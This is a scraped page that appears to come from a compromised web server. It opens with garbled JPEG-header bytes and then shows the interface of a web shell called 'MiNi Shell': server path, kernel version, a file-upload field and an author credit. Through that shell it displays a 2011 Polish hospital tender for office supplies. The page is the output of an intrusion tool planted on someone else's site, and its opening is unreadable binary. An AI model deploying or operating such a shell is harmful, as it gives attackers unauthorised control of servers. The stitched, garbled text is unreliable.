JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110531/136404-N-2011.html

<p class="kh_header"><b>Cibórz: Zakup i dostawa materiałów biurowych oraz materiałów eksploatacyjnych do drukarek i kserokopiarek</b><br>
<b>Numer ogłoszenia: 136404 - 2011; data zamieszczenia: 31.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny dla Nerwowo i Psychicznie Chorych, Samodzielny Publiczny Zakład Opieki Zdrowotnej , 66-213 Cibórz, woj. lubuskie, tel. 068 3419335 w. 265, faks 068 3419494.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ciborz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów biurowych oraz materiałów eksploatacyjnych do drukarek i kserokopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Papier A-4 80g do drukarek i ksreokopiarek 1100 ryz
Papier do drukarki grubość A-4 200g-m2 1 ryza
Papier do drukarki kolorowy A-4 80g 1 ryza
Papier do drukarek igłowych 10 kartonów
Papier A-3 80g kserokopiarki 30 ryz
Taśma klejąca 19mm x 33m 400 szt.
Taśma klejąca 24mm x 33m 5 szt.
Taśma pakowa brązowa  48mmx66m klej kauczukowy naturalny 	50 szt.
Taśma klejąca 12mm x 30m 15 szt.
Taśma klejąca 15mm x 33m 70 szt.
Podajnik do taśmy klejącej szer. 19mm	 1 szt.
Spinacze 28mm (op. po 100 szt.) 330 op.
Klipsy biurowe (19mm) op po 12 szt. 20 op.
Klipsy biurowe (32mm) op po 12 szt 20 op.
Klipsy biurowe (51mm) op po 12 szt 20 op.
Klipsy biurowe (25mm) op po 12 szt 10 op.
Zszywki 24-6 op. po 1000 szt. 250 op.
Zszywki 23-10 op. po 1000 szt. 5 op.
Zszywki 10 op. po 1000 szt.10 op.
Zszywacz 6 szt.
Marker czarny gruby 60 szt.
Marker biały 1 szt.
Marker czerwony 3 szt.
Marker niebieski 2 szt.
Marker czarny do opisywania płyt CD cienki 10 szt.
Markery wodoodporne 4 kolory 1 op.
Koszulki krystaliczne, A4 op.100 szt., grubość folii nie mniej niż 48 mic, multiperforowane	53 op.
Segregator formatu A4, szerokość grzbietu 75mm,  wyposażony w mechanizm dźwigniowy oraz blokadę, dolne krawędzie wzmocnione niklowanym okuciem, otwór na palec na grzbiecie również wzmocniony niklowanym okuciem, kolory do ustalenia. 190 szt.	
Segregator formatu A4, szerokość grzbietu 50mm,  wyposażony w mechanizm dźwigniowy oraz blokadę, dolne krawędzie wzmocnione niklowanym okuciem, otwór na palec na grzbiecie również wzmocniony niklowanym okuciem, kolory do ustalenia 60 szt.
Segregator formatu A5, szerokość grzbietu 75mm,  wyposażony w mechanizm dźwigniowy oraz blokadę, dolne krawędzie wzmocnione niklowanym okuciem, otwór na palec na grzbiecie również wzmocniony niklowanym okuciem, kolory do ustalenia 10 szt.
Teczka kartonowa z gumką A4, wykonana z kartonu o gramaturze 250 g-m2, kolor biały, nadruk umożliwiający opis zawartości	450 szt.	
Teczka kartonowa wiązana A4, wykonana z kartonu o gramaturze 250 g-m2, kolor biały, nadruk umożliwiający opis zawartości	1400 szt.	
Teczka kartonowa z gumką A4, wykonana z kartonu o gramaturze 250 g-m2, różne kolory, nadruk umożliwiający opis zawartości	30 szt.
Długopis zwykły, długość linii pisania min. 1700 m, kolor wkładu niebieski 200 szt.
Długopis zwykły, długość linii pisania min. 1700 m, kolor wkładu czerwony 80 szt.
Długopis zwykły, długość linii pisania min. 1700 m, kolor wkładu czarny 20 szt.
Długopis zwykły, długość linii pisania min. 1700 m, kolor wkładu zielony 5 szt.	
Wkłady czerwone do długopisu zwykłego długość linii pisania min. 1700m 10 szt.
Wkład do długopisu chińskiego	2 op.
Długopis żelowy z wymiennym wkładem, przeźroczysta obudowa, ze skuwką. Kolor wkładu czarny. Typu Pentel K-106 lub równoważny 10 szt.
Długopis typu Pentel BK66 lub równoważny  wkład niebieski 130 szt.
Dziurkacz metalowy, z blokadą rączki, ogranicznik formatu wg. Norm DIN, odstęp między dziurkami 80 mm, dziurkuje jednorazowo nie mniej niż 25 kartek papieru 80g. 1 szt. 
Zeszyt w kratkę A5 miękka okładka 60 kart 120 szt.
Zeszyt w kratkę A4 twarda okładka 96 kart 70 szt.
Zeszyt w kratkę A4 twarda okładka 192 kart 2 szt.
Zeszyt w kratkę A-5 twarda okładka 96 kart 20 szt.
Zeszyt w kratkę A-4 twarda okładka 160 kart 1 szt.
Zeszyt w linie A-4 twarda okładka 96 kart 1 szt.
Korektor w taśmie, ergonomiczna obudowa, wymiar taśmy 4,2 mm x 9 m, nie pozostawia śladów na kserokopiach, odporny na światło. Szybkoschnąca  końcówka korektorująca wyposażona w zatyczkę. 30 szt.	
Korektor w płynie z gąbką, szybkoschnący, pojemność nie mniej niż 20 ml. 110 szt.
Korektor w piórze, pojemność 12 ml, przeźroczysta nasadka, Typu Pentel ZLC31 lub równoważny 30 szt.
Szpilki 50g 11 szt.
Pinezki op. po 50 szt. 23 op.
Pinezki beczułki kolorowe op. po 50 szt. 10 op.
Tablica korkowa 100cm x 150cm 1 szt.
Nożyczki biurowe z satynowym ostrzem ze stali nierdzewnej, rękojeść z niełamliwego plastiku, całkowita długości 17cm, 3 szt.
Folia laminacyjna min 80 micron A-4 1200 szt.
Ołówek drewniany z gumką , twardość HB, grafit w całości wklejany 50 szt.
Grafity do ołówka automatycznego (0,5mm HB) 2 op.
Temperówka aluminiowa jednootworowa 3 szt
Gumka do ścierania grafitu z papieru nie niszczy ścieranej powierzchni, wymiar około (4cm x 1cm x 2cm) 5 szt.
Przekładki kartonowe kolorowe do segregatora A-4 (10,5cm x 24cm) 650 szt.
Karteczki samoprzylepne żółte, wymiar 75 x 75 mm w bloczku 100 karteczek	30 szt.
Karteczki samoprzylepne żółte, wymiar 40 x 50 mm, w bloczku 100 karteczek, w op. 3 bloczki 7 op.	
Karteczki samoprzylepne żółte, wymiar 50 x 75 mm w bloczku 100 karteczek 30 szt.
Zakładki indeksujące, cienkie foliowe 12x43mm, op. 4 kolory po 50 szt. 15 op.
Klej w sztyfcie, nietoksyczny, nie zawiera rozpuszczalników, nie niszczy ani nie deformuje klejonych kartek, 15g. Typu Donau lub równoważny 35 szt.
Klej biurowy w tubce 40 ml 3 szt.
Tusz do pieczątek, kolor czerwony, pojemność nie mniej niż 25ml typu Noris lub równoważny 35 szt.
Tusz do pieczątek, kolor czarny, pojemność nie mniej niż 25ml typu Noris lub równoważny 25 szt.
Zakreślacz fluorescencyjny z tuszem na bazie wody, z możliwością napełniania , ścięta końcówka, szerokość linii od 2do 5mm, op.4kolory. 	20 op.
Cienkopis biurowy, końcówka fibrowa, skuwka wentylowana, średnica pisania 0,4 mm. Końcówka oprawiona w metal opakowanie zawiera 6 kolorów. Typu Stabilo Point 88  lub równoważny	10 op.
Cienkopis biurowy, kolor czarny, końcówka fibrowa, skuwka wentylowana, średnica pisania 0,4 mm. Końcówka oprawiona w metal. Typu Stabilo Point 88  lub równoważny 10 szt.
Cienkopis biurowy, kolor zielony, końcówka fibrowa, skuwka wentylowana, średnica pisania 0,4 mm. Końcówka oprawiona w metal. Typu Stabilo Point 88  lub równoważny 12 szt.
Cienkopis biurowy, kolor czerwony, końcówka fibrowa, skuwka wentylowana, średnica pisania 0,4 mm. Końcówka oprawiona w metal. Typu Stabilo Point 88  lub równoważny 10 szt.
Koperta biała C6 (114mm x 162mm) samoprzylepne 1700 szt.
Koperta biała  C4 (229mm x 324mm) samoprzylepne 850 szt.
Koperta biała C5 (229mm x 162mm) samoprzylepne 400 szt.
Koperta E4 280x400x40 mm, rozszerzane boki i dno, biała, samoprzylepne 40 szt.
Koperta szara format B5 (176mm x 250mm) samoprzylepne 3000 szt.
Skoroszyt A4 z PCV, wpinany z multiperforacją, przednia okładka przeźroczysta, tylna kolorowa, wyposażony w papierowy, wysuwany pasek do opisu 300 szt.
Wąsy do skoroszytu 50 szt.	
Skoroszyty zwykłe, papierowe, kolor biały, karton o grubości min.250g/m2. 150 szt.
Identyfikatory wielorazowe z klipsem i agrafką, przeźroczysty, 30 szt.
Identyfikatory wielorazowe na smyczy, przeźroczysty, 70 szt.
Okładka do bindowania przeźroczysta, bezbarwna, grubość folii 150 mic 100 szt.
Okładka kartonowa do bindowania, wykonane z kartonu 250g/m2, obustronnie kolorowy, struktura skóropodobna, kolor do uzgodnienia	100 szt.
Grzbiety plastikowe do bindowania 14 mm 50 szt.
Grzbiety plastikowe do bindowania 22 mm 50 szt.	
Blok techniczny biały A-4 20 szt.
Pudło archiwizacyjne grzbiet 150mm dł. 355mm wys. 250mm typu Esselte lub równoważny 50 szt.
Karton archiwizacyjny zamykany z góry dł 350mm szer 350mm wys. 280mm typu Esselte lub równoważny 10 szt.
Pudło archiwizacyjne grzbiet 100mm dł. 345mm wys. 245mm typu Esselte lub równoważny 20 szt.
Papier do faxu 210/15m 20 szt.
Taśma do metkownicy dwurzędowej 120 szt.
Wałek tuszujący do metkownicy dwurzędowej BLITZ 4 szt.
Taśma barwiąca do maszyny do pisania 2 szt.
Bateria 1,5V 30 szt.
Linijka 40 cm przeźroczysta 2 szt.
Płyta CD-R 700MB	3200 szt.
Płyta  DVD R+ 4,7GB 150 szt.
Koperty na płyty CD i DVD z okienkiem 3350 szt.
Kalka maszynowa A-4 5 op.
Rolki termiczne do drukarki 49mm x 30m 10 szt.
Pisaki zwykłe opakowanie 12 kolorów 10 op.
Pisaki zwykłe opakowanie 6 kolorów 10 op.
Pisaki grubość pisania min 4mm opakowanie 4 kolory 2 op.
Woreczki strunowe 100mm x 150mm op po 100 szt. 2 op.
Kalendarz stojący na biurko na 2012 rok A5 3 szt.
Kalendarz książkowy na 2012 rok format A5 4 szt.
Kalendarz książkowy na 2012 rok format A4 1 szt.
Papier samoprzylepny kolorowy blok A-4 3szt. 
Skorowidz alfabetyczny, format  A4, 160 kartek, oprawa sztywna, szyty 3 szt.
Blok notatnikowy w kratkę A4 -100kartek, grzbiet klejony	10 szt.
Okładka na dyplomy z godłem Polski format A-4 5 szt.
Okładka na dyplomy A-4 5 szt.
Kalkulator biurowy 8 pozycji wyświetlacza, 1 szt.
Niszczarka biurowa, niszczy w paski  nie mniej niż 8 kartek, pojemność kosza min. 18L, typu Fellowes P-45C lub równoważna 3 szt.
Wkład - kostka biała, papierowa nie klejona 85x85x80 mm 10 szt.
Toner do CANON IR 3300  3 szt.
Toner do TOSHIBA 1370 2 szt.
Toner do CANON IP 1900 10szt.
Toner do HP DeskJet 520 czarny 10 szt.
Toner do HP Photosmart C3180 czarny 3 szt.
Toner do HP Photosmart C3180 color 1 szt.
Toner do BROTHER DCP-8070D 3 szt.	
Toner do Oki B410 DN 30 szt.
Toner do BROTHER DCP-7030 20 szt.
Toner do BROTHER 7010L 5 szt.
Toner do HP LaserJet 1018 15 szt.
Toner do CANON Pixma MP160 czarny PG-40 10 szt.
Toner do CANON Pixma MP160 kolor CL-41 10 szt.
Toner HP-26 5 szt.	
Toner do HP LaserJet P1006	8 szt.
Taśma do drukarki OKI MIKROLINE 3320 10 szt.	
Zestaw doładowujący toner drukarki HP 840C 3	szt.
Toner do XEROX PHASER 3300MFP 3 szt.
Toner do HP P2055DN 4 szt.
Toner do HP LaserJet 1022 4 szt.
Toner do LEXMARK Z612 6 szt.
Bęben do drukarki BROTHER DCP-7030	 1 szt.
Toner do HP 3745 czarny 4	szt.
Toner do HP 3745 kolor 4	szt.
Toner do HP Laser Jet M1319fMFP 14	szt.
Bęben do drukarki HP Laser Jet M1319fMFP 1 szt.
Toner do  CANON IR5000 5 szt.
Toner do HP Desk Jet 2060 2 szt.
Toner do SAMSUNG ML-1640 MONO LASER SPRINTER 2 szt.
Toner do HP LaserJet 1020 25 szt.
Książka raportów pielęgniarskich MZ-SzP-15 75 szt.
Książka gabinetu zabiegowego A4 Mz-Og-9 11 szt.
Księga Ruchu Chorych MZ-SzP-61 4 szt.
Druki Dowód wypłaty typ 402-5  35 bloczków
Druk Zaświadczenie o zarobkach index 02023 500 szt.
Druk Lista obecności typ 506-1 15 szt.
Druk Polecenie wyjazdu służbowego typ 505-3 25 szt.
Druk Roczna karta ewidencji obecności w pracy typ 508-3 karton 50 szt. 12 kartonów
Druk: Ewidencja wyjść w godzinach służbowych typ 574-1 1 szt.
Pocztowa książka nadawcza A-5 3 szt.
Dziennik do korespondencji 300 kart, A-4 oprawa introligatorska 1 szt.
Druk: Historia Choroby - Szpital Psychiatryczny MZ-3-90-SzP-70 blok po 100 szt. 30 bloczków
Druk: Wkłady do historii choroby - Szpital Psychiatryczny MZ-3-90-SzP-70a blok po 100 szt. 30 bloczków
Druk: Potwierdzenie odbioru rzeczy chorego MZ-SzP-20-s 25 bloczków
Druk: Historia Choroby - Poradnia Zdrowia Psychicznego MZ-3-90-Ps-1 blok po 100 szt.	5 bloczków
Druk: Wkłady do historii choroby - Poradnia Zdrowia Psychicznego MZ-3-90-Ps-1a blok po 100 szt. 5 bloczków
Druk: Wyciąg z historii choroby psychiatrycznej MZ-3-90-SzP-71 blok po 80 szt. 7 bloczków
Druk: Księga Przyjęć i odmów MZ-SzP-58 4 szt.
Druk: Księga oczekujących pacjentów na udzielenie świadczeń MZ-Ks-4 1 szt.
Druk: Wywieszka magazynowa typ: 347-5 op. po 50 szt. 20 op
Druk: Dziennik budowy DB2 A-4 60 kartek 14 szt.
Druk: Kwitariusz przychodowy typ: 400-3 12 szt.
Druk: Kartoteka magazynowa typ: 344-3 op. po 50 szt. 20 op..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5, 22.80.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie podpisanego oświadczenia z art. 22 ust.1 pkt.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie podpisanego oświadczenia z art. 22 ust.1 pkt.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie podpisanego oświadczenia z art. 22 ust.1 pkt.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie podpisanego oświadczenia z art. 22 ust.1 pkt.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ciborz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny dla Nerwowo i Psychicznie Chorych
SP ZOZ w Ciborzu
66-213 Skąpe.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2011 godzina 11:00, miejsce: Wojewódzki Szpital Specjalistyczny dla Nerwowo i Psychicznie Chorych
SP ZOZ w Ciborzu
66-213 Skąpe.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com